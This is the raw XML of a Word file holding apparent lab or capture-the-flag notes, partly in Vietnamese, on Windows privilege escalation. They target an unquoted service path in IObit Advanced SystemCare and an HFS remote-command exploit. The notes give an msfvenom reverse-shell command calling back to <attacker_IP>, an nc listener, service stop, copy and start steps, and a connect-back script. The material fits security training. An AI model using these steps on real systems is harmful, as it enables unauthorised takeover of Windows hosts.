          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00467DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Admin Privilege</w:t>
      </w:r>
      <w:r w:rsidR="005968F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7FBACD" w14:textId="7966D0FC" w:rsidR="00B2205F" w:rsidRPr="00EF2A1D" w:rsidRDefault="00B2205F" w:rsidP="0015284A">
      <w:pPr>
        <w:ind w:left="144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Now, </w:t>
      </w:r>
      <w:r w:rsidR="007037F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">generate a </w:t>
      </w:r>
      <w:r w:rsidR="007037F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse shell .exe</w:t>
      </w:r>
      <w:r w:rsidR="001545B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="001545B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a fake ASC.exe service)</w:t>
      </w:r>
      <w:r w:rsidR="007037F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and write it to the service’s directory. Then restart the service to </w:t>
      </w:r>
      <w:r w:rsidR="007037F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get Admin priv.</w:t>
      </w:r>
      <w:r w:rsidR="00A414AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A414AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(since ASC was started by “</w:t>
      </w:r>
      <w:r w:rsidR="00A414AB" w:rsidRPr="00BF2187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LocalSystem”</w:t>
      </w:r>
      <w:r w:rsidR="00D13EAD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00EF2A1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF2A1D" w:rsidRPr="00EF2A1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00EF2A1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF2A1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get an ADMIN shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ADFC14" w14:textId="77777777" w:rsidR="00036E91" w:rsidRPr="00A414AB" w:rsidRDefault="00036E91" w:rsidP="0015284A">
      <w:pPr>
        <w:ind w:left="1440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14:paraId="0CA1985B" w14:textId="2E5E986D" w:rsidR="00036E91" w:rsidRDefault="00036E91" w:rsidP="00036E91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E0A5E5E" w14:textId="3991196C" w:rsidR="00036E91" w:rsidRDefault="00036E91" w:rsidP="00036E91">
      <w:pPr>
        <w:ind w:firstLine="72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Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F34474C" w14:textId="0B04CC70" w:rsidR="006B136B" w:rsidRDefault="00F83E8C" w:rsidP="00F83E8C">
      <w:pPr>
        <w:ind w:left="1440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B1 </w:t>
      </w:r>
      <w:r w:rsidR="000E4DC6" w:rsidRPr="000E4DC6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$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</w:t>
      </w:r>
      <w:r w:rsidR="000E4DC6" w:rsidRPr="000E4DC6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msfvenom -p </w:t>
      </w:r>
      <w:r w:rsidR="000E4DC6" w:rsidRPr="004655C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CA"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidR="000E4DC6" w:rsidRPr="000E4DC6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 </w:t>
      </w:r>
      <w:r w:rsidR="000E4DC6" w:rsidRPr="000E4DC6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LHOST=</w:t>
      </w:r>
      <w:r w:rsidR="000E4DC6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&lt;</w:t>
      </w:r>
      <w:r w:rsidR="0051205E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CA"/>
        </w:rPr>
        <w:t>attacker_</w:t>
      </w:r>
      <w:r w:rsidR="00380F7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CA"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="000E4DC6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&gt;</w:t>
      </w:r>
      <w:r w:rsidR="000E4DC6" w:rsidRPr="000E4DC6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LPORT=1</w:t>
      </w:r>
      <w:r w:rsidR="005709B1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111</w:t>
      </w:r>
      <w:r w:rsidR="000E4DC6" w:rsidRPr="000E4DC6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-f exe -o ASCService.exe</w:t>
      </w:r>
      <w:r w:rsidR="00D31C34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ab/>
      </w:r>
      <w:r w:rsidR="00D31C34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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F77493" w14:textId="66066409" w:rsidR="00D31C34" w:rsidRDefault="00D31C34" w:rsidP="00D31C34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D31C34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F83E8C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>B2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D31C34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="009A48F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upload</w:t>
      </w:r>
      <w:r w:rsidR="001E64AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, start nc listener</w:t>
      </w:r>
      <w:r w:rsidR="009A48F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D31C34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Copy that executables malware to the service’s director</w:t>
      </w:r>
      <w:r w:rsidR="009A48F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA0CA3F" w14:textId="31D1E60B" w:rsidR="00E555CF" w:rsidRPr="00E555CF" w:rsidRDefault="00E555CF" w:rsidP="000628C4">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nc -nvlp </w:t>
      </w:r>
      <w:r w:rsidR="00855BA9">
        <w:t>&lt;#port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75998515" w14:textId="433627C7" w:rsidR="009F5D7E" w:rsidRPr="009F5D7E" w:rsidRDefault="009F5D7E" w:rsidP="000628C4">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="009F5D7E">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>sc stop AdvancedSystemCareService9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FB1527" w14:textId="6D66F2AB" w:rsidR="009F5D7E" w:rsidRDefault="009F5D7E" w:rsidP="000628C4">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652399E1" w14:textId="2D49F81A" w:rsidR="001E64AA" w:rsidRPr="00CB60D2" w:rsidRDefault="001E64AA" w:rsidP="001E64AA">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="009F5D7E">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">sc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidRPr="009F5D7E">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> AdvancedSystemCareService9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BFC694" w14:textId="77777777" w:rsidR="00CB60D2" w:rsidRPr="001A4022" w:rsidRDefault="00CB60D2" w:rsidP="00CB60D2">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="2548"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1415B12C" w14:textId="181F2450" w:rsidR="00E41778" w:rsidRPr="00E41778" w:rsidRDefault="00E41778" w:rsidP="00E41778">
      <w:p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            B3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enjoy</w:t>
      </w:r>
      <w:r w:rsidR="00B77395">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Admin shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D39CF44" w14:textId="0CC61A53" w:rsidR="009A48F4" w:rsidRPr="00D31C34" w:rsidRDefault="009A48F4" w:rsidP="00D31C3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14:paraId="6EBAC0AF" w14:textId="0182A1AE" w:rsidR="00152D4F" w:rsidRDefault="001369AF" w:rsidP="00831145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Task 4: Without Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A76343" w14:textId="21FDA7BB" w:rsidR="001369AF" w:rsidRDefault="001369AF" w:rsidP="00831145">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs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>Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B186815" w14:textId="320E238E" w:rsidR="001369AF" w:rsidRPr="00DE3811" w:rsidRDefault="001966F8" w:rsidP="001F31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u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE3811">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="001369AF" w:rsidRPr="00DE3811">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c.exe</w:t>
      </w:r>
      <w:r w:rsidR="00DE3811">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: To listen for incoming reverse shell connection</w:t>
      </w:r>
      <w:r w:rsidR="00EC3602">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (from victim)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E011997" w14:textId="75272BB5" w:rsidR="001F3106" w:rsidRPr="001F3106" w:rsidRDefault="001F3106" w:rsidP="001F31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8431F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WebServer</w:t>
      </w:r>
      <w:r w:rsidR="006F5102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="008431F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F5102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E36D9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">hosting nc.exe </w:t>
      </w:r>
      <w:r w:rsidR="002275FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(on attacker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696C9BD1" w14:textId="7DA94551" w:rsidR="00DE45F2" w:rsidRDefault="001966F8" w:rsidP="001F31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354E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="00DE45F2" w:rsidRPr="001F3106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE45F2" w:rsidRPr="00DE45F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00DE45F2" w:rsidRPr="001F3106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> reserverShell .exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D53E38" w14:textId="045595B0" w:rsidR="00354E6A" w:rsidRDefault="00354E6A" w:rsidP="001F31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t>RemoteCommandExecution</w:t>
      </w:r>
      <w:r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u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidR="001D4427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="001D4427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> py and ps1 scripts, execute </w:t>
      </w:r>
      <w:r w:rsidR="001D4427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">remote commands </w:t>
      </w:r>
      <w:r w:rsidR="001D4427">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the HFS server (:8080)</w:t>
      </w:r>
      <w:r w:rsidR="006D36E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625C2799" w14:textId="62256E3F" w:rsidR="006D36E8" w:rsidRDefault="001545B8" w:rsidP="006D36E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i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="003865E5" w:rsidRPr="001A44BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/39161</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7335C94C" w14:textId="77777777" w:rsidR="003865E5" w:rsidRPr="00084FBA" w:rsidRDefault="003865E5" w:rsidP="003865E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2166"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0116B428" w14:textId="21BB087F" w:rsidR="001369AF" w:rsidRDefault="001369AF" w:rsidP="0083114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14:paraId="1F41C362" w14:textId="44A12CBF" w:rsidR="001369AF" w:rsidRDefault="001369AF" w:rsidP="0083114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 xml:space="preserve">Idea: </w:t>
      </w:r>
      <w:r w:rsidR="00715EEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vẫn đánh “</w:t>
      </w:r>
      <w:r w:rsidR="00DE45F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unquoted</w:t>
      </w:r>
      <w:r w:rsidR="00715EEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Service path” vulnerability để gain access through </w:t>
      </w:r>
      <w:r w:rsidR="00715EEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="00F5050C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E6291" w14:textId="32B552A5" w:rsidR="0030317D" w:rsidRDefault="0030317D" w:rsidP="0083114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u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RemoteCommandExecution</w:t>
      </w:r>
      <w:r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u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">py: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">lệnh để </w:t>
      </w:r>
      <w:r w:rsidR="00A36C7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tạo reverse_script, execute_it and connect back nc.exe &lt;attackIP&gt; &lt;attackPort&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71305E27" w14:textId="6798F2AE" w:rsidR="00C93440" w:rsidRDefault="00C93440" w:rsidP="00831145">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B76DD65" w14:textId="4D9841F4" w:rsidR="00C13D60" w:rsidRDefault="00C93440" w:rsidP="00831145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>Để escalate lên</w:t>
      </w:r>
      <w:r w:rsidR="00EA3B01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Admin</w:t>
      </w:r>
      <w:r w:rsidR="00C13D60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6526FFE9" w14:textId="06EF2BA1" w:rsidR="00C13D60" w:rsidRPr="00C13D60" w:rsidRDefault="00C13D60" w:rsidP="0083114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3C1A73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C844247" w14:textId="77777777" w:rsidR="004A4C4A" w:rsidRPr="0030317D" w:rsidRDefault="004A4C4A" w:rsidP="00831145">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747D56D7" w14:textId="442CDFC5" w:rsidR="00152D4F" w:rsidRPr="00F2422B" w:rsidRDefault="00152D4F" w:rsidP="00831145">
      <w:pP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14:paraId="13BCE55B" w14:textId="5F07CBCA" w:rsidR="00831145" w:rsidRPr="00831145" w:rsidRDefault="00831145">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CAFD448" w14:textId="056A467B" w:rsidR="00910742" w:rsidRPr="00B329E3" w:rsidRDefault="00910742">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CEC6EC1" w14:textId="6EF8A2E8" w:rsidR="00305E0F" w:rsidRDefault="00017A6D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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D59FD80" w14:textId="190A2944" w:rsidR="00D717EF" w:rsidRDefault="00FF45DC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs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</w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D717EF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E598BA" w14:textId="5E20CC65" w:rsidR="007C36E7" w:rsidRPr="007C36E7" w:rsidRDefault="007C36E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007C36E7" w:rsidRPr="007C36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A0302"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF9C3B2C"/>
    <w:lvl w:ilvl="0" w:tplc="1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485A5EDD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63AAFB16"/>
    <w:lvl w:ilvl="0" w:tplc="10090001">
      <w:start w:val="1"/>
